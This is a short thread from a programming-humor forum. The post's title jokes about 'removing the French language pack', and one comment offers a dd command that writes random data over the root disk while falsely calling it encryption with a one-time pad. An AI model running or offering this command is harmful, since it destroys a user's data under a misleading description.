𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟@programming.dev to Programmer Humor@programming.dev · 1 year agoHow to remove the French language packprogramming.devimagemessage-square25fedilinkarrow-up1268arrow-down16
arrow-up1262arrow-down1imageHow to remove the French language packprogramming.dev𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟@programming.dev to Programmer Humor@programming.dev · 1 year agomessage-square25fedilink
minus-squareinterolivary@beehaw.orglinkfedilinkarrow-up4·1 year agoYou can also use dd to encrypt your hard drive using a randomized one-time pad: dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k
You can also use
dd
to encrypt your hard drive using a randomized one-time pad:dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k